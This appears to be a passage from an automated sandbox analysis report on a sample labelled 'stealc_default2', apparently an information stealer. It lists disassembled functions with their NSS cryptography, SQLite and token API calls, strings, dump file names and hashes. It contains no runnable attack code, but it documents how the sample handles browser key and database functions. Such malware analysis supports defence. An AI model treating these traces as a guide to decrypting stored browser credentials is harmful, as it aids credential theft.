                                                                                                                                                                            • PK11_ImportEncryptedPrivateKeyInfoAndReturnKey.NSS3(?,00000000,?,?,?,00000001,00000001,?,?,00000000,?), ref: 6C8F8038
                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C8F8050
                                                                                                                                                                            • PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6C8F8093
                                                                                                                                                                            • SECOID_FindOID_Util.NSS3 ref: 6C8F7F29
                                                                                                                                                                              • Part of subcall function 6C8F07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C898298,?,?,?,6C88FCE5,?), ref: 6C8F07BF
                                                                                                                                                                              • Part of subcall function 6C8F07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C8F07E6
                                                                                                                                                                              • Part of subcall function 6C8F07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C8F081B
                                                                                                                                                                              • Part of subcall function 6C8F07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C8F0825
                                                                                                                                                                            • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C8F8072
                                                                                                                                                                            • SECOID_FindOID_Util.NSS3 ref: 6C8F80F5
                                                                                                                                                                              • Part of subcall function 6C8FBC10: SECITEM_CopyItem_Util.NSS3(?,?,?,?,-00000001,?,6C8F800A,00000000,?,00000000,?), ref: 6C8FBC3F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Util$Item_$Error$Zfree$DestroyPublic$Find$Alloc_CopyHashImportK11_LookupTablememcpy$AlgorithmCertificateConstCurrentEncryptedInfoOptionPrivateReturnTag_Threadfreestrchrstrcmpstrlen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2815116071-0
                                                                                                                                                                            • Opcode ID: b38342aecbff23e6e4bc73cc0da4c9ed745802330375478349bc6906b9ec359b
                                                                                                                                                                            • Instruction ID: 2f5f32d2816767cc7223092c01153804d44c415ca693b70bc06983ed20107364
                                                                                                                                                                            • Opcode Fuzzy Hash: b38342aecbff23e6e4bc73cc0da4c9ed745802330375478349bc6906b9ec359b
                                                                                                                                                                            • Instruction Fuzzy Hash: 75E1A1716043009FE720CF29DA80B5A77E5EF89788F550D2DE8A99BB51E731EC06CB52
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 6C881C6B
                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 6C881C75
                                                                                                                                                                            • GetTokenInformation.ADVAPI32(00000400,00000004,?,00000400,?), ref: 6C881CA1
                                                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 6C881CA9
                                                                                                                                                                            • malloc.MOZGLUE(00000000), ref: 6C881CB4
                                                                                                                                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 6C881CCC
                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000005(TokenIntegrityLevel),?,00000400,?), ref: 6C881CE4
                                                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 6C881CEC
                                                                                                                                                                            • malloc.MOZGLUE(00000000), ref: 6C881CFD
                                                                                                                                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 6C881D0F
                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 6C881D17
                                                                                                                                                                            • AllocateAndInitializeSid.ADVAPI32 ref: 6C881D4D
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 6C881D73
                                                                                                                                                                            • PR_LogPrint.NSS3(_PR_NT_InitSids: OpenProcessToken() failed. Error: %d,00000000), ref: 6C881D7F
                                                                                                                                                                            Strings
                                                                                                                                                                            • _PR_NT_InitSids: OpenProcessToken() failed. Error: %d, xrefs: 6C881D7A
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Token$CopyInformationLengthProcessmalloc$AllocateCloseCurrentErrorHandleInitializeLastOpenPrint
                                                                                                                                                                            • String ID: _PR_NT_InitSids: OpenProcessToken() failed. Error: %d
                                                                                                                                                                            • API String ID: 3748115541-1216436346
                                                                                                                                                                            • Opcode ID: b446396f6c06193dbb1d4cde2a368725b2b6c01baf84cce24f6f902c7ca66b6c
                                                                                                                                                                            • Instruction ID: a16d34d89e8db15b9b4e425c7c32aa61112b91f7102fc6b517d74481734f53b5
                                                                                                                                                                            • Opcode Fuzzy Hash: b446396f6c06193dbb1d4cde2a368725b2b6c01baf84cce24f6f902c7ca66b6c
                                                                                                                                                                            • Instruction Fuzzy Hash: 9B31A4B1A04218AFEF50EF64DC48BAA7FB8FF5E305F104069FA4992110EB309994CF65
                                                                                                                                                                            APIs
                                                                                                                                                                            • __aulldiv.LIBCMT ref: 6C883DFB
                                                                                                                                                                            • __allrem.LIBCMT ref: 6C883EEC
                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C883FA3
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,00000001), ref: 6C884047
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C8840DE
                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C88415F
                                                                                                                                                                            • __allrem.LIBCMT ref: 6C88416B
                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C884288
                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C8842AB
                                                                                                                                                                            • __allrem.LIBCMT ref: 6C8842B7
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$memcpy$__aulldiv
                                                                                                                                                                            • String ID: %02d$%03d$%04d$%lld
                                                                                                                                                                            • API String ID: 703928654-3678606288
                                                                                                                                                                            • Opcode ID: 4d079af2f981af927f1d2ccbfbd24c68f3ac257ce0e5c6942e4e21accba685b9
                                                                                                                                                                            • Instruction ID: ad1ae1dd37bd6f814c90904e6e05536e659129060b969a222d2086118e79a153
                                                                                                                                                                            • Opcode Fuzzy Hash: 4d079af2f981af927f1d2ccbfbd24c68f3ac257ce0e5c6942e4e21accba685b9
                                                                                                                                                                            • Instruction Fuzzy Hash: 66F13072A087409FD725CF38C990A6BB7FAAFD5308F148E2DF48597A51E730D8458B82
                                                                                                                                                                            APIs
                                                                                                                                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C831D58
                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C831EFD
                                                                                                                                                                            • sqlite3_exec.NSS3(00000000,00000000,Function_00007370,?,00000000), ref: 6C831FB7
                                                                                                                                                                            Strings
                                                                                                                                                                            • sqlite_master, xrefs: 6C831C61
                                                                                                                                                                            • table, xrefs: 6C831C8B
                                                                                                                                                                            • attached databases must use the same text encoding as main database, xrefs: 6C8320CA
                                                                                                                                                                            • abort due to ROLLBACK, xrefs: 6C832223
                                                                                                                                                                            • unknown error, xrefs: 6C832291
                                                                                                                                                                            • unsupported file format, xrefs: 6C832188
                                                                                                                                                                            • sqlite_temp_master, xrefs: 6C831C5C
                                                                                                                                                                            • SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 6C831F83
                                                                                                                                                                            • no more rows available, xrefs: 6C832264
                                                                                                                                                                            • another row available, xrefs: 6C832287
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_byteswap_ulongsqlite3_exec
                                                                                                                                                                            • String ID: SELECT*FROM"%w".%s ORDER BY rowid$abort due to ROLLBACK$another row available$attached databases must use the same text encoding as main database$no more rows available$sqlite_master$sqlite_temp_master$table$unknown error$unsupported file format
                                                                                                                                                                            • API String ID: 563213449-2102270813
                                                                                                                                                                            • Opcode ID: ad21a0c5de2ce8b98880fdb78bac43357f7a80592fca456d80718b67df13bdf0
                                                                                                                                                                            • Instruction ID: f37c2a349b94c63f4405a041f497cedeb051a19280765bffa2a28556119a2d7d
                                                                                                                                                                            • Opcode Fuzzy Hash: ad21a0c5de2ce8b98880fdb78bac43357f7a80592fca456d80718b67df13bdf0
                                                                                                                                                                            • Instruction Fuzzy Hash: 6312F2706083118FD721CF59C59461AB7F2BF85718F18AD6DE8898BB52C735E84ACBC2
                                                                                                                                                                            APIs
                                                                                                                                                                            • PR_EnterMonitor.NSS3(FF000001,?,?,?,00000000,6C907FFA,00000000,?,6C9323B9,00000002,00000000,?,6C907FFA,00000002), ref: 6C92DE33
                                                                                                                                                                              • Part of subcall function 6C959090: TlsGetValue.KERNEL32 ref: 6C9590AB
                                                                                                                                                                              • Part of subcall function 6C959090: TlsGetValue.KERNEL32 ref: 6C9590C9
                                                                                                                                                                              • Part of subcall function 6C959090: EnterCriticalSection.KERNEL32 ref: 6C9590E5
                                                                                                                                                                              • Part of subcall function 6C959090: TlsGetValue.KERNEL32 ref: 6C959116
                                                                                                                                                                              • Part of subcall function 6C959090: LeaveCriticalSection.KERNEL32 ref: 6C95913F
                                                                                                                                                                              • Part of subcall function 6C92D000: PORT_ZAlloc_Util.NSS3(00000108,?,6C92DE74,6C907FFA,00000002,?,?,?,?,?,00000000,6C907FFA,00000000,?,6C9323B9,00000002), ref: 6C92D008
                                                                                                                                                                            • PR_ExitMonitor.NSS3(FF000001,?,?,?,?,?,00000000,6C907FFA,00000000,?,6C9323B9,00000002,00000000,?,6C907FFA,00000002), ref: 6C92DE57
                                                                                                                                                                            • memset.VCRUNTIME140(?,00000000,00000088), ref: 6C92DEA5
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C92E069
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C92E121
                                                                                                                                                                            • PK11_FreeSymKey.NSS3(?), ref: 6C92E14F
                                                                                                                                                                            • PK11_CreateContextBySymKey.NSS3(?,00000000,?,00000000), ref: 6C92E195
                                                                                                                                                                            • PR_GetCurrentThread.NSS3 ref: 6C92E1FC
                                                                                                                                                                              • Part of subcall function 6C922460: PR_SetError.NSS3(FFFFE005,00000000,6C9C7379,00000002,?), ref: 6C922493
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorValue$CriticalEnterK11_MonitorSection$Alloc_ContextCreateCurrentExitFreeLeaveThreadUtilmemset
                                                                                                                                                                            • String ID: application data$early application data$handshake data$key
                                                                                                                                                                            • API String ID: 1461918828-2699248424
                                                                                                                                                                            • Opcode ID: 2ce0e83a1796f5ac2ed208e0f06baaaf147c46343de99251fd404b88da94bd5d
                                                                                                                                                                            • Instruction ID: 60cd895b184ef6131134b4513f2639b1d58bf66535734c85cf0dfb37695c4043
                                                                                                                                                                            • Opcode Fuzzy Hash: 2ce0e83a1796f5ac2ed208e0f06baaaf147c46343de99251fd404b88da94bd5d
                                                                                                                                                                            • Instruction Fuzzy Hash: B9C10371A102159BDB14CF79C8C0BEAB7B8FF19309F144138E8499BB59E335E954CBA1
                                                                                                                                                                            APIs
                                                                                                                                                                            • SECOID_FindOID_Util.NSS3(?), ref: 6C8B7DDC
                                                                                                                                                                              • Part of subcall function 6C8F07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C898298,?,?,?,6C88FCE5,?), ref: 6C8F07BF
                                                                                                                                                                              • Part of subcall function 6C8F07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C8F07E6
                                                                                                                                                                              • Part of subcall function 6C8F07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C8F081B
                                                                                                                                                                              • Part of subcall function 6C8F07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C8F0825
                                                                                                                                                                            • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C8B7DF3
                                                                                                                                                                            • PK11_PBEKeyGen.NSS3(?,00000000,00000000,00000000,?), ref: 6C8B7F07
                                                                                                                                                                            • PK11_GetPadMechanism.NSS3(00000000), ref: 6C8B7F57
                                                                                                                                                                            • PK11_UnwrapPrivKey.NSS3(?,00000000,00000000,?,0000001C,00000000,?,?,?,00000000,00000130,00000004,?), ref: 6C8B7F98
                                                                                                                                                                            • PK11_FreeSymKey.NSS3(?), ref: 6C8B7FC9
                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C8B7FDE
                                                                                                                                                                            • PK11_PBEKeyGen.NSS3(?,?,00000000,00000001,?), ref: 6C8B8000
                                                                                                                                                                              • Part of subcall function 6C8D9430: SECOID_GetAlgorithmTag_Util.NSS3(00000000,?,?,00000000,00000000,?,6C8B7F0C,?,00000000,00000000,00000000,?), ref: 6C8D943B
                                                                                                                                                                              • Part of subcall function 6C8D9430: SECOID_FindOIDByTag_Util.NSS3(00000000,?,?), ref: 6C8D946B
                                                                                                                                                                              • Part of subcall function 6C8D9430: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?), ref: 6C8D9546
                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C8B8110
                                                                                                                                                                            • PK11_FreeSymKey.NSS3(00000000), ref: 6C8B811D
                                                                                                                                                                            • PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6C8B822D
                                                                                                                                                                            • SECKEY_DestroyPublicKey.NSS3(?), ref: 6C8B823C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: K11_Util$FindItem_Tag_Zfree$ErrorFreeHashLookupPublicTable$AlgorithmConstDestroyImportMechanismPrivUnwrap
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1923011919-0
                                                                                                                                                                            • Opcode ID: eef4890ea04ad9240948b9b7cf8cc99426e8e98790b72d2350d74a816408aae1
                                                                                                                                                                            • Instruction ID: 2fc08ddfdcc951b62c71fb190c5b0698a09fa9a8114b24771ae07b94d4e1a9e9
                                                                                                                                                                            • Opcode Fuzzy Hash: eef4890ea04ad9240948b9b7cf8cc99426e8e98790b72d2350d74a816408aae1
                                                                                                                                                                            • Instruction Fuzzy Hash: 72C15EB1D402599FEB31CF14CD40BEAB7B9AF05348F0489A9E91DB6641E7319E858FA0
                                                                                                                                                                            APIs
                                                                                                                                                                            • PK11_PubDeriveWithKDF.NSS3 ref: 6C8C0F8D
                                                                                                                                                                            • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C8C0FB3
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C8C1006
                                                                                                                                                                            • PK11_FreeSymKey.NSS3(?), ref: 6C8C101C
                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C8C1033
                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C8C103F
                                                                                                                                                                            • PK11_FreeSymKey.NSS3(00000000), ref: 6C8C1048
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?), ref: 6C8C108E
                                                                                                                                                                            • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C8C10BB
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,00000006,?), ref: 6C8C10D6
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?), ref: 6C8C112E
                                                                                                                                                                              • Part of subcall function 6C8C1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6C8C08C4,?,?), ref: 6C8C15B8
                                                                                                                                                                              • Part of subcall function 6C8C1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6C8C08C4,?,?), ref: 6C8C15C1
                                                                                                                                                                              • Part of subcall function 6C8C1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8C162E
                                                                                                                                                                              • Part of subcall function 6C8C1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8C1637
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1510409361-0
                                                                                                                                                                            • Opcode ID: f5bbb00d549255c78ea73512c0678f5774480509a9fd58b607d7d112a68aa250
                                                                                                                                                                            • Instruction ID: aabe149a55ee6ef3e94f9b3050882d448f7203ada32ad27df877eba7d27155f1
                                                                                                                                                                            • Opcode Fuzzy Hash: f5bbb00d549255c78ea73512c0678f5774480509a9fd58b607d7d112a68aa250
                                                                                                                                                                            • Instruction Fuzzy Hash: 8371D3B1A002058FDB24CFA9DEC4A6AF7F1BF88318F148A2DE50997751E731D945CB92
                                                                                                                                                                            APIs
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,00000020), ref: 6C8E1F19
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,00000020), ref: 6C8E2166
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,00000010), ref: 6C8E228F
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,00000010), ref: 6C8E23B8
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C8E241C
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: memcpy$Error
                                                                                                                                                                            • String ID: manufacturer$model$serial$token
                                                                                                                                                                            • API String ID: 3204416626-1906384322
                                                                                                                                                                            • Opcode ID: 3df00e7443d32bd7b14c5c79b95eeadfb88ad6da076b12c5fdb1388da11578a8
                                                                                                                                                                            • Instruction ID: 7764e47636614a8f46ecaa4da184a1d09b819dd98aacd25b38c5d840b88029bc
                                                                                                                                                                            • Opcode Fuzzy Hash: 3df00e7443d32bd7b14c5c79b95eeadfb88ad6da076b12c5fdb1388da11578a8
                                                                                                                                                                            • Instruction Fuzzy Hash: 9D020262E0C7C96EF7328671C54C3D7BAE09B4B328F0C1A6DC5EE46683C7AC59498791
                                                                                                                                                                            APIs
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C891C6F,00000000,00000004,?,?), ref: 6C8E6C3F
                                                                                                                                                                              • Part of subcall function 6C93C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C93C2BF
                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C891C6F,00000000,00000004,?,?), ref: 6C8E6C60
                                                                                                                                                                            • PR_ExplodeTime.NSS3(00000000,6C891C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C891C6F,00000000,00000004,?,?), ref: 6C8E6C94
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Alloc_ArenaErrorExplodeTimeUtilValue
                                                                                                                                                                            • String ID: gfff$gfff$gfff$gfff$gfff
                                                                                                                                                                            • API String ID: 3534712800-180463219
                                                                                                                                                                            • Opcode ID: f2a3c641d88b6cf8a106efbd8bdfa5a536bf0b549b39257b427fe8611318f031
                                                                                                                                                                            • Instruction ID: f525303f68ab1b876fe71216b4e2f7666d78e2dcc225e08e30a3e79f37784338
                                                                                                                                                                            • Opcode Fuzzy Hash: f2a3c641d88b6cf8a106efbd8bdfa5a536bf0b549b39257b427fe8611318f031
                                                                                                                                                                            • Instruction Fuzzy Hash: 76514B72B016494FC718CDADDC526DEB7DAABE5310F48C23AE842DB781D638D906C751
                                                                                                                                                                            APIs
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,00000002,?,6C94CF46,?,6C81CDBD,?,6C94BF31,?,?,?,?,?,?,?), ref: 6C82B039
